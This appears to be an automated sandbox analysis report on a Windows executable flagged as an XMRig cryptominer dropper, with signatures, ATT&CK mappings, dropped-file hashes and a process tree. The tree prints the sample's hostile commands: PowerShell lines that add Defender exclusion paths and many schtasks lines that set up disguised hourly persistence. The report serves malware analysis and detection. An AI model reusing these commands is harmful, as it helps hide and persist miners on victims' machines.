Analysis

  • max time kernel
    300s
  • max time network
    198s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    16-05-2022 22:15

General

  • Target

    932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe

  • Size

    16KB

  • MD5

    23c8b23571c065c1d8c65beb2899cc42

  • SHA1

    fd7f51575ccaeba2cd6cb0d2195e2be966c0fecf

  • SHA256

    932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2

  • SHA512

    af1df92b60d1cff475deb7688b7a8baff26feb240a0d48a9cd73df3d1a5b9acff72d353f686de259d3bd77c0df1a7f7b269434789189a26c46a02313bdb5e64c

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 7 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe
    "C:\Users\Admin\AppData\Local\Temp\932b589a050018c47609fa544370f1382525764c3ed1df2b844ffaa05297d4e2.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:536
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Windows\SysWOW64\chcp.com
        chcp 1251
        3⤵
          PID:1636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1324
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 788
            4⤵
            • Suspicious behavior: GetForegroundWindowSpam
            PID:1164
      • C:\ProgramData\Dllhost\dllhost.exe
        "C:\ProgramData\Dllhost\dllhost.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:300
          • C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Creates scheduled task(s)
            PID:928
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          3⤵
            PID:1244
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              4⤵
              • Creates scheduled task(s)
              PID:1268
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            3⤵
              PID:1932
              • C:\Windows\SysWOW64\schtasks.exe
                SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                4⤵
                • Creates scheduled task(s)
                PID:240
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              3⤵
                PID:1500
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  4⤵
                  • Creates scheduled task(s)
                  PID:1448
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                3⤵
                  PID:1392
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                    4⤵
                    • Creates scheduled task(s)
                    PID:1604
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  3⤵
                    PID:1668
                    • C:\Windows\SysWOW64\schtasks.exe
                      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                      4⤵
                      • Creates scheduled task(s)
                      PID:1924
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                    3⤵
                      PID:1644
                      • C:\Windows\SysWOW64\schtasks.exe
                        SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                        4⤵
                        • Creates scheduled task(s)
                        PID:632
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk2498" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                      3⤵
                        PID:1632
                        • C:\Windows\SysWOW64\schtasks.exe
                          SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk2498" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                          4⤵
                          • Creates scheduled task(s)
                          PID:1488
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                        3⤵
                          PID:1620
                          • C:\Windows\SysWOW64\schtasks.exe
                            SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            4⤵
                            • Creates scheduled task(s)
                            PID:572
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk5772" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                          3⤵
                            PID:1364
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk5772" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                              4⤵
                              • Creates scheduled task(s)
                              PID:992
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk97" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            3⤵
                              PID:1404
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk97" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                4⤵
                                • Creates scheduled task(s)
                                PID:952
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk3944" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                              3⤵
                                PID:892
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk3944" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:1720
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                3⤵
                                • Loads dropped DLL
                                PID:928
                                • C:\Windows\SysWOW64\chcp.com
                                  chcp 1251
                                  4⤵
                                    PID:1984
                                  • C:\ProgramData\Dllhost\winlogson.exe
                                    C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                    4⤵
                                    • Executes dropped EXE
                                    PID:1364
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                  3⤵
                                    PID:2008
                                    • C:\Windows\SysWOW64\chcp.com
                                      chcp 1251
                                      4⤵
                                        PID:816
                                      • C:\ProgramData\Dllhost\winlogson.exe
                                        C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                        4⤵
                                        • Executes dropped EXE
                                        PID:952
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                      3⤵
                                        PID:1108
                                        • C:\Windows\SysWOW64\chcp.com
                                          chcp 1251
                                          4⤵
                                            PID:1228
                                          • C:\ProgramData\Dllhost\winlogson.exe
                                            C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1596
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                          3⤵
                                            PID:1720
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              4⤵
                                                PID:1072
                                              • C:\ProgramData\Dllhost\winlogson.exe
                                                C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                                4⤵
                                                • Executes dropped EXE
                                                PID:1740
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                              3⤵
                                                PID:288
                                                • C:\Windows\SysWOW64\chcp.com
                                                  chcp 1251
                                                  4⤵
                                                    PID:1532
                                                  • C:\ProgramData\Dllhost\winlogson.exe
                                                    C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:1708
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                                  3⤵
                                                    PID:1364
                                                    • C:\Windows\SysWOW64\chcp.com
                                                      chcp 1251
                                                      4⤵
                                                        PID:1808
                                                      • C:\ProgramData\Dllhost\winlogson.exe
                                                        C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:2036

                                                Network

                                                MITRE ATT&CK Matrix ATT&CK v6

                                                Execution

                                                Scheduled Task

                                                1
                                                T1053

                                                Persistence

                                                Registry Run Keys / Startup Folder

                                                1
                                                T1060

                                                Scheduled Task

                                                1
                                                T1053

                                                Privilege Escalation

                                                Scheduled Task

                                                1
                                                T1053

                                                Defense Evasion

                                                Modify Registry

                                                2
                                                T1112

                                                Install Root Certificate

                                                1
                                                T1130

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\ProgramData\Dllhost\dllhost.exe
                                                  Filesize

                                                  80KB

                                                  MD5

                                                  0426f4269f3de8ffe4f85df9e8454b4b

                                                  SHA1

                                                  6fa3f292df8c849d10a21140f48d9d64d27870fe

                                                  SHA256

                                                  ee0a13f5d66a499fc53678ba0e4f55f769ecb8a883d90f6025cd62c7f4ddf0ad

                                                  SHA512

                                                  566b6711569011ac26294ff00ce8c06667b0dd387a89ef5e49847138ad5a25144f13a1f58bac763bc3d3d454f3ba068494e08b702f5d3e4005a5cb1feab54d02

                                                • C:\ProgramData\Dllhost\dllhost.exe
                                                  Filesize

                                                  80KB

                                                  MD5

                                                  0426f4269f3de8ffe4f85df9e8454b4b

                                                  SHA1

                                                  6fa3f292df8c849d10a21140f48d9d64d27870fe

                                                  SHA256

                                                  ee0a13f5d66a499fc53678ba0e4f55f769ecb8a883d90f6025cd62c7f4ddf0ad

                                                  SHA512

                                                  566b6711569011ac26294ff00ce8c06667b0dd387a89ef5e49847138ad5a25144f13a1f58bac763bc3d3d454f3ba068494e08b702f5d3e4005a5cb1feab54d02

                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • C:\ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • C:\ProgramData\HostData\logs.uce
                                                  Filesize

                                                  503B

                                                  MD5

                                                  8b078b9c907544907733f5f47030bcb7

                                                  SHA1

                                                  0c45a6f025053768758df477c4812c5933a8e366

                                                  SHA256

                                                  d8c7f0f440d786c3ebc13a59eb5e99d31e34c89cb47603f4f790da54707c34df

                                                  SHA512

                                                  3ab98331ab7913bdafac180a3976b9c8bb24c68c1aeb109f5c18939d5725f4c38d81565551f9b2dba297e16d71c7ece671cda2ca3d101ec20d957cc7a160db41

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  60KB

                                                  MD5

                                                  b9f21d8db36e88831e5352bb82c438b3

                                                  SHA1

                                                  4a3c330954f9f65a2f5fd7e55800e46ce228a3e2

                                                  SHA256

                                                  998e0209690a48ed33b79af30fc13851e3e3416bed97e3679b6030c10cab361e

                                                  SHA512

                                                  d4a2ac7c14227fbaf8b532398fb69053f0a0d913273f6917027c8cadbba80113fdbec20c2a7eb31b7bb57c99f9fdeccf8576be5f39346d8b564fc72fb1699476

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  304B

                                                  MD5

                                                  6572000d525ba9bf91a766420928f23e

                                                  SHA1

                                                  05945d1a348757c2e22f15a6a8f4883d0cd12a67

                                                  SHA256

                                                  072689b2e0bc1267acdd9f6afaf2adf84d3527bcb2b46b8b1e480ce02844454c

                                                  SHA512

                                                  d626ae03945e79065b386c22e608e5239fa62ef4f7cde88ba5abab9be398089a387545cd83ee6408c2d95259064570728cefa3bce94ca37fe276d0b609aaee34

                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                  Filesize

                                                  7KB

                                                  MD5

                                                  0672ee0ca92848a5791ae68a6874fde8

                                                  SHA1

                                                  e99f81e61ad47b3e848de2d84de635d30c70ca48

                                                  SHA256

                                                  dc7fc3f116c57c244fbb6b2b2043cc162c6e3edc0be379693a86860a45cfbcd2

                                                  SHA512

                                                  b9cf58f28b99e9974b110c87efd2d22490916d2cbd1702c1ed548dbd71aee1d8f93321f34988f35dc2504821bd0f2338c4c8ebf3862334c4f3422d04e8c7949e

                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                  Filesize

                                                  7KB

                                                  MD5

                                                  0672ee0ca92848a5791ae68a6874fde8

                                                  SHA1

                                                  e99f81e61ad47b3e848de2d84de635d30c70ca48

                                                  SHA256

                                                  dc7fc3f116c57c244fbb6b2b2043cc162c6e3edc0be379693a86860a45cfbcd2

                                                  SHA512

                                                  b9cf58f28b99e9974b110c87efd2d22490916d2cbd1702c1ed548dbd71aee1d8f93321f34988f35dc2504821bd0f2338c4c8ebf3862334c4f3422d04e8c7949e

                                                • \ProgramData\Dllhost\dllhost.exe
                                                  Filesize

                                                  80KB

                                                  MD5

                                                  0426f4269f3de8ffe4f85df9e8454b4b

                                                  SHA1

                                                  6fa3f292df8c849d10a21140f48d9d64d27870fe

                                                  SHA256

                                                  ee0a13f5d66a499fc53678ba0e4f55f769ecb8a883d90f6025cd62c7f4ddf0ad

                                                  SHA512

                                                  566b6711569011ac26294ff00ce8c06667b0dd387a89ef5e49847138ad5a25144f13a1f58bac763bc3d3d454f3ba068494e08b702f5d3e4005a5cb1feab54d02

                                                • \ProgramData\Dllhost\winlogson.exe
                                                  Filesize

                                                  7.9MB

                                                  MD5

                                                  ae6c92c8073b1239390369d3ed93538f

                                                  SHA1

                                                  a76ea83bdcfa472cd593363e9bb254df494a5577

                                                  SHA256

                                                  d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

                                                  SHA512

                                                  59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

                                                • memory/240-91-0x0000000000000000-mapping.dmp
                                                • memory/288-126-0x0000000000000000-mapping.dmp
                                                • memory/300-78-0x0000000000000000-mapping.dmp
                                                • memory/536-55-0x0000000075B61000-0x0000000075B63000-memory.dmp
                                                  Filesize

                                                  8KB

                                                • memory/536-54-0x0000000000E20000-0x0000000000E2A000-memory.dmp
                                                  Filesize

                                                  40KB

                                                • memory/572-96-0x0000000000000000-mapping.dmp
                                                • memory/632-94-0x0000000000000000-mapping.dmp
                                                • memory/816-112-0x0000000000000000-mapping.dmp
                                                • memory/892-90-0x0000000000000000-mapping.dmp
                                                • memory/928-105-0x0000000000000000-mapping.dmp
                                                • memory/928-84-0x0000000000000000-mapping.dmp
                                                • memory/952-92-0x0000000000000000-mapping.dmp
                                                • memory/952-113-0x0000000000000000-mapping.dmp
                                                • memory/992-93-0x0000000000000000-mapping.dmp
                                                • memory/1072-122-0x0000000000000000-mapping.dmp
                                                • memory/1108-116-0x0000000000000000-mapping.dmp
                                                • memory/1112-75-0x0000000000820000-0x000000000083A000-memory.dmp
                                                  Filesize

                                                  104KB

                                                • memory/1112-76-0x00000000004C0000-0x00000000004C6000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/1112-72-0x0000000000000000-mapping.dmp
                                                • memory/1164-68-0x0000000000000000-mapping.dmp
                                                • memory/1228-117-0x0000000000000000-mapping.dmp
                                                • memory/1244-80-0x0000000000000000-mapping.dmp
                                                • memory/1268-101-0x0000000000000000-mapping.dmp
                                                • memory/1324-61-0x0000000000000000-mapping.dmp
                                                • memory/1324-64-0x000000006F330000-0x000000006F8DB000-memory.dmp
                                                  Filesize

                                                  5.7MB

                                                • memory/1364-131-0x0000000000000000-mapping.dmp
                                                • memory/1364-110-0x00000000000F0000-0x0000000000110000-memory.dmp
                                                  Filesize

                                                  128KB

                                                • memory/1364-88-0x0000000000000000-mapping.dmp
                                                • memory/1364-108-0x0000000000000000-mapping.dmp
                                                • memory/1392-82-0x0000000000000000-mapping.dmp
                                                • memory/1404-89-0x0000000000000000-mapping.dmp
                                                • memory/1424-58-0x0000000000000000-mapping.dmp
                                                • memory/1424-60-0x000000006F230000-0x000000006F7DB000-memory.dmp
                                                  Filesize

                                                  5.7MB

                                                • memory/1448-99-0x0000000000000000-mapping.dmp
                                                • memory/1488-95-0x0000000000000000-mapping.dmp
                                                • memory/1500-81-0x0000000000000000-mapping.dmp
                                                • memory/1532-127-0x0000000000000000-mapping.dmp
                                                • memory/1596-118-0x0000000000000000-mapping.dmp
                                                • memory/1604-100-0x0000000000000000-mapping.dmp
                                                • memory/1620-86-0x0000000000000000-mapping.dmp
                                                • memory/1632-87-0x0000000000000000-mapping.dmp
                                                • memory/1636-57-0x0000000000000000-mapping.dmp
                                                • memory/1644-85-0x0000000000000000-mapping.dmp
                                                • memory/1668-83-0x0000000000000000-mapping.dmp
                                                • memory/1708-128-0x0000000000000000-mapping.dmp
                                                • memory/1720-98-0x0000000000000000-mapping.dmp
                                                • memory/1720-121-0x0000000000000000-mapping.dmp
                                                • memory/1724-56-0x0000000000000000-mapping.dmp
                                                • memory/1740-123-0x0000000000000000-mapping.dmp
                                                • memory/1808-132-0x0000000000000000-mapping.dmp
                                                • memory/1924-97-0x0000000000000000-mapping.dmp
                                                • memory/1932-79-0x0000000000000000-mapping.dmp
                                                • memory/1980-65-0x0000000000000000-mapping.dmp
                                                • memory/1980-70-0x000000006EF80000-0x000000006F52B000-memory.dmp
                                                  Filesize

                                                  5.7MB

                                                • memory/1984-106-0x0000000000000000-mapping.dmp
                                                • memory/2008-111-0x0000000000000000-mapping.dmp
                                                • memory/2036-133-0x0000000000000000-mapping.dmp